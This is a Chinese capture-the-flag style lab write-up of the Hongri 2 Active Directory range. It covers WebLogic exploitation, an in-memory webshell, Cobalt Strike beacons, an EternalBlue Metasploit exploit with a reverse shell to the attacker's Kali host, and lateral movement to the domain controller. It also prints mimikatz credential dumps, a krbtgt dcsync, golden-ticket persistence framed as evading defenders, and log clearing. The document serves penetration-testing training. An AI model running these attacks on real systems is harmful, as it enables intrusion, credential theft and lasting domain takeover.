红日2
灵境平台本地kali网络配置:LingJing(灵境)外部虚拟机联动_使用虚拟机访问灵境靶场-CSDN博客
hongri2
描述:
靶机信息:
DC:10.10.10.10 (内网) Windows 2012(64)
WEB:10.10.10.80 (内网) Windows 2008(64) WebLogic环境靶机启动即秒启服务,旧版360已关闭
PC:10.10.10.201(内网) Windows 7(32) ,旧版360已关闭
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX(灵境平台修改了WEB靶机密码)
Bypass UAC
Windows系统NTLM获取(理论知识:Windows认证)
Access Token利用(MSSQL利用)
WMI利用
网页代理,二层代理,特殊协议代理(DNS,ICMP)
域内信息收集
域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
域凭证收集
后门技术(黄金票据/白银票据/Sid History/MOF)
原靶机项目地址:http://vulnstack.qiyuanxuetang.net/vuln/
靶机ip:192.168.242.75
本地kali:192.168.188.114
cs服务端:192.168.188.114
外网:weblogic
fscan扫一下
7001端口,weblogic
工具利用
写入内存马
哥斯拉连接
shell信息收集
C:/Oracle/Middleware/user_projects/domains/base_domain/ >whoami
de1ay\administrator
是在de1ay域内的管理员
C:/Oracle/Middleware/user_projects/domains/base_domain/ >net user /domain
这项请求将在域 de1ay.com 的域控制器处理。
\\DC.de1ay.com 的用户帐户
-------------------------------------------------------------------------------
Administrator de1ay Guest
krbtgt mssql
命令成功完成。
有这几个账号:Administrator 、de1ay 、Guest 、krbtgt 、mssql
C:/Oracle/Middleware/user_projects/domains/base_domain/ >net view
发生系统错误 6118。
此工作组的服务器列表当前无法使用
C:/Oracle/Middleware/user_projects/domains/base_domain/ >net group "Domain Controllers" /domain
这项请求将在域 de1ay.com 的域控制器处理。
发生系统错误 1355。
指定的域不存在,或无法联系。
但是这些又显示无法使用,问了ai大概意思就是
- 本地缓存了域管理员凭据
- 但无法联系域控,所以无法行使域管理员权限
- 本质是"有身份,无权限"
本机权限:极高(管理员级)
域利用:暂时用不了(因为连不上DC)
C:/Oracle/Middleware/user_projects/domains/base_domain/ >ipconfig
Windows IP 配置
以太网适配器 本地连接 5:
连接特定的 DNS 后缀 . . . . . . . :
本地站点的 IPv6 地址. . . . . . . : fec0::188d:8d27:db9:103e%1
本地链接 IPv6 地址. . . . . . . . : fe80::188d:8d27:db9:103e%17
IPv4 地址 . . . . . . . . . . . . : 10.0.2.15
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : fe80::2%17
以太网适配器 本地连接 4:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::f057:c033:ded:ac5a%16
IPv4 地址 . . . . . . . . . . . . : 10.10.10.80
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 本地连接 3:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::60bd:1304:c325:7dc1%15
IPv4 地址 . . . . . . . . . . . . : 192.168.242.75
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.242.168
隧道适配器 isatap.{7ED29A7E-8AEF-4A7E-AE7B-FB0F3A211FD3}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{19B40DB0-E176-44B2-9F9B-4407C91CE415}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{F6BDEE6B-89BC-4F36-AB63-6BC5F15CAB0E}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
C:/Oracle/Middleware/user_projects/domains/base_domain/ >systeminfo
主机名: WEB
OS 名称: Microsoft Windows Server 2008 R2 Standard
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 成员服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00477-001-0000421-84103
初始安装日期: 2019/9/8, 19:01:04
系统启动时间: 2025/12/22, 4:11:37
系统制造商: QEMU
系统型号: Standard PC (i440FX + PIIX, 1996)
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: AMD64 Family 15 Model 107 Stepping 1 AuthenticAMD ~2398 Mhz
BIOS 版本: SeaBIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org, 2014/4/1
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,047 MB
可用的物理内存: 875 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用: 2,691 MB
虚拟内存: 使用中: 1,404 MB
页面文件位置: C:\pagefile.sys
域: de1ay.com
登录服务器: \\DC
修补程序: 安装了 3 个修补程序。
[01]: KB2999226
[02]: KB958488
[03]: KB976902
网卡: 安装了 3 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接 3
启用 DHCP: 否
IP 地址
[01]: 192.168.242.75
[02]: fe80::60bd:1304:c325:7dc1
[02]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接 4
启用 DHCP: 否
IP 地址
[01]: 10.10.10.80
[02]: fe80::f057:c033:ded:ac5a
[03]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接 5
启用 DHCP: 是
DHCP 服务器: 10.0.2.2
IP 地址
[01]: 10.0.2.15
[02]: fe80::188d:8d27:db9:103e
[03]: fec0::188d:8d27:db9:103e
上线
cs监听器:
上传之后执行(靶机是可以通kali的)
提权
权限维持
先看进程
rundll32是2088,9999是2122,迁移到可以长期存活的进程,explore是2704
进程迁移
inject 2704 x64
第一个提权之后到system,此时的 Beacon 运行在 SYSTEM 权限下,但身份是机器账户,所以执行不了那些域内用户可以执行的命令
进程迁移之后变回administrator相当于又回到了域内管理员所以可以执行那些进行域内信息收集的命令
ms17-010
之前fscan是扫了一个ms17-010出来的,利用一下
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.188.114
set RHOSTS 192.168.242.75
set LPORT 4444
show options
run
socks
设置好socks
cs信息收集
cs上面执行
shell net user /domain
这项请求将在域 de1ay.com 的域控制器处理。
\\DC.de1ay.com 的用户帐户
-------------------------------------------------------------------------------
Administrator de1ay Guest
krbtgt mssql
命令成功完成。
shell arp /a
接口: 192.168.242.75 --- 0xf
Internet 地址 物理地址 类型
192.168.242.168 52-54-00-12-34-57 动态
192.168.242.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
接口: 10.10.10.80 --- 0x10
Internet 地址 物理地址 类型
10.10.10.10 52-54-00-41-4a-40 动态
10.10.10.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
接口: 10.0.2.15 --- 0x11
Internet 地址 物理地址 类型
10.0.2.2 52-55-0a-00-02-02 动态
10.0.2.3 52-55-0a-00-02-03 动态
10.0.2.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
其他的一些用不了,总结一下得到的信息
内网ip:10.10.10.80是现在上线这台主机的内网ip,10.10.10.10是另外一台
ARP扫描发现所有存活主机
beacon> portscan 10.10.10.0/24 445 arp
看看主机列表
一共三台,再扫扫端口,这里自己用nmap扫一直超时,遂放弃
明文密码
横向移动
选择DC那台目标主机
选域管理员,SMB是新创建的SMB监听器
session选进程迁移之后的那个
横向移动成功
上线DC
抓取明文密码
[03/28 11:00:49] beacon> logonpasswords
[03/28 11:00:49] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[03/28 11:00:49] [+] host called home, sent: 312966 bytes
[03/28 11:00:51] [+] received output:
Authentication Id : 0 ; 5329824 (00000000:005153a0)
Session : NewCredentials from 0
User Name : administrator
Domain : DE1AY
Logon Server : (null)
Logon Time : 2026/3/28 2:57:14
SID : S-1-5-21-2756371121-2868759905-3853650604-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* NTLM : cf83cd7efde13e0ce754874aaa979a74
tspkg :
* Username : Administrator
* Domain : DE1AY
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DE1AY
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DE1AY
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1370194 (00000000:0014e852)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2025/12/22 4:37:28
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 2e8c54f1bc3332785e163b4240c82139
* SHA1 : d9845a21597c81d51dfec8a10daeeef224f74305
tspkg :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
kerberos :
* Username : WEB$
* Domain : de1ay.com
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
ssp :
credman :
Authentication Id : 0 ; 1297502 (00000000:0013cc5e)
Session : NetworkCleartext from 0
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:36:54
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv :
[00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : de1ay
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : de1ay
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : de1ay
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 1295886 (00000000:0013c60e)
Session : Service from 0
User Name : sshd_544
Domain : VIRTUAL USERS
Logon Server : (null)
Logon Time : 2025/12/22 4:36:53
SID : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-544
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 2e8c54f1bc3332785e163b4240c82139
* SHA1 : d9845a21597c81d51dfec8a10daeeef224f74305
tspkg :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
kerberos :
* Username : WEB$
* Domain : de1ay.com
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
ssp :
credman :
Authentication Id : 0 ; 159390 (00000000:00026e9e)
Session : Service from 0
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:13:56
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
msv :
[00000003] Primary
* Username : mssql
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : mssql
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB$
Domain : DE1AY
Logon Server : (null)
Logon Time : 2025/12/22 4:12:10
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 2e8c54f1bc3332785e163b4240c82139
* SHA1 : d9845a21597c81d51dfec8a10daeeef224f74305
tspkg :
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
kerberos :
* Username : web$
* Domain : DE1AY.COM
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
ssp :
credman :
Authentication Id : 0 ; 25864 (00000000:00006508)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/12/22 4:12:02
SID :
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 2e8c54f1bc3332785e163b4240c82139
* SHA1 : d9845a21597c81d51dfec8a10daeeef224f74305
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 1024339 (00000000:000fa153)
Session : NetworkCleartext from 0
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:28:56
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv :
[00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : de1ay
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : de1ay
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : de1ay
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 1022575 (00000000:000f9a6f)
Session : Service from 0
User Name : sshd_2996
Domain : VIRTUAL USERS
Logon Server : (null)
Logon Time : 2025/12/22 4:28:47
SID : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-2996
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 2e8c54f1bc3332785e163b4240c82139
* SHA1 : d9845a21597c81d51dfec8a10daeeef224f74305
tspkg :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
kerberos :
* Username : WEB$
* Domain : de1ay.com
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
ssp :
credman :
Authentication Id : 0 ; 273873 (00000000:00042dd1)
Session : Interactive from 1
User Name : administrator
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:18:07
SID : S-1-5-21-2756371121-2868759905-3853650604-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* LM : 020e3fc4eff5c9d61d91a081d4b37861
* NTLM : cf83cd7efde13e0ce754874aaa979a74
* SHA1 : a2dc253087c47bce0db3f5931635212dbfdb9e77
tspkg :
* Username : Administrator
* Domain : DE1AY
* Password : 2wsx!QAZ
wdigest :
* Username : Administrator
* Domain : DE1AY
* Password : 2wsx!QAZ
kerberos :
* Username : administrator
* Domain : DE1AY.COM
* Password : 2wsx!QAZ
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/12/22 4:14:18
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 130033 (00000000:0001fbf1)
Session : Service from 0
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:12:50
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
msv :
[00000003] Primary
* Username : mssql
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : mssql
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/12/22 4:12:11
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB$
Domain : DE1AY
Logon Server : (null)
Logon Time : 2025/12/22 4:12:01
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
kerberos :
* Username : web$
* Domain : DE1AY.COM
* Password : Bm6wd=L6t;KbeX"Een0`Q+sQ"x5Zc>?<8+TW("`@ZkfLc2mI"f)rF/dwLe[b>hF5ND]?dUl10hYqEx@v+XKlyo$fotzz5`w[J3Nl`46?!%Es%&..xPF;99UU
ssp :
credman :
得到信息:
域管理员账户
用户名:Administrator
明文密码:2wsx!QAZ
Domain:DE1AY.COM
hash:cf83cd7efde13e0ce754874aaa979a74
SID:S-1-5-21-2756371121-2868759905-3853650604
黄金票据
拿到DC
获取 krbtgt hash
这是什么
这是域控上一个特殊的服务账户,它的作用是:
- 负责颁发所有的 Kerberos 票据
- 拥有整个域的"签名密钥"
拿到之后能做什么
- 制作黄金票据(Golden Ticket)
有了 krbtgt hash,你可以伪造任何用户的 TGT(票据授予票据)
你可以:
┌─────────────────────────────────────────┐
│ 假装自己是域管理员 │
│ 假装自己是域内任何用户 │
│ 访问域内任何资源 │
│ 不需要任何密码! │
└─────────────────────────────────────────┘
类比:krbtgt 就像是公司总部的公章。有了它,你可以自己签发任何人的"工作证",出入任何部门。
- 持久化后门(即使管理员改了所有密码)
| 场景 | 没有黄金票据 | 有黄金票据 |
|---|---|---|
| 管理员改了域管密码 | 你失去了访问权限 | 你仍然可以访问 |
| 管理员删除了你的账户 | 你彻底被踢出 | 你还可以伪造新账户 |
| 管理员重装了域控 | 需要重新攻击 | 需要重新获取 hash |
关键:只要 krbtgt hash 不变,你的后门就永远存在!
- 隐藏身份(难以追踪)
使用黄金票据访问域资源时:
- 日志显示是"合法用户"访问
- 不会触发异常告警
- 蓝队很难发现是攻击者
黄金票据的工作原理
正常流程:
用户登录 → 请求 TGT → krbtgt 签发 → 用 TGT 访问资源
黄金票据(攻击者视角):
攻击者直接用 krbtgt hash 伪造 TGT → 跳过了认证 → 直接访问资源
获取
dcsync DE1AY.COM krbtgt
[03/28 11:35:03] beacon> dcsync DE1AY.COM krbtgt
[03/28 11:35:03] [*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:DE1AY.COM /user:krbtgt command
[03/28 11:35:03] [+] host called home, sent: 312946 bytes
[03/28 11:35:05] [+] received output:
[DC] 'DE1AY.COM' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2019/9/9 10:44:59
Object Security ID : S-1-5-21-2756371121-2868759905-3853650604-502
Object Relative ID : 502
Credentials:
Hash NTLM: 82dfc71b72a11ef37d663047bc2088fb
ntlm- 0: 82dfc71b72a11ef37d663047bc2088fb
lm - 0: 9b5cd36575630d629f3aa6d769ec91c3
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DE1AY.COMkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 42e65a58c000dab8d353b1ff2bee93383f27f0966767afa8c1f32fc51122d118
aes128_hmac (4096) : 5eb13d2a0e1f4980c3e3810d5da3da4f
des_cbc_md5 (4096) : 79c8dc79fe467552
* Primary:Kerberos *
Default Salt : DE1AY.COMkrbtgt
Credentials
des_cbc_md5 : 79c8dc79fe467552
* Packages *
Kerberos-Newer-Keys
* Primary:WDigest *
01 6486daf200f85102b9a66f0bb698f964
02 618b4df7c8262508a26641b5271693fe
03 657b7f6a13829e21c18da26ee927dd7a
04 6486daf200f85102b9a66f0bb698f964
05 618b4df7c8262508a26641b5271693fe
06 6702b7e06d68443bbd003fa1fd2ad6c2
07 6486daf200f85102b9a66f0bb698f964
08 5057528d4ee40f9ffda5ab89fc76e45c
09 5057528d4ee40f9ffda5ab89fc76e45c
10 ec101c8f1831c5ddefbcdabf2d854077
11 48c89ab471a5a096c8895ca7c9fb8098
12 5057528d4ee40f9ffda5ab89fc76e45c
13 f63f9768f77b7a60dd75f79b210d31c5
14 48c89ab471a5a096c8895ca7c9fb8098
15 334888d42cd914936f94d6c2875f77a3
16 334888d42cd914936f94d6c2875f77a3
17 930580b0e2523dbc40d8b34efc9a83d1
18 d7bb3256dc319c0a9bdbff3ef0b3d618
19 120122f0735a3841c210d145d092d0fc
20 d371f34cf41adb5a09c8507a94066c48
21 61b1669bec1aa4a9873703229854e57d
22 61b1669bec1aa4a9873703229854e57d
23 963efa120b17bf8ea89eb2906fdf0092
24 8a015afc23c33423a0557e59bd6d573c
25 8a015afc23c33423a0557e59bd6d573c
26 a1fa583bfc8008249d6649630aada4a0
27 c13cf2b5ecb0894a09f8dd0831732da4
28 679145bff502118a02f6f3af19067da2
29 e371aa57cba0556074c58686ef433c30
验证黄金票据
shell klist
痕迹清除
用了cs的那些个插件清除了
浙公网安备 33010602011771号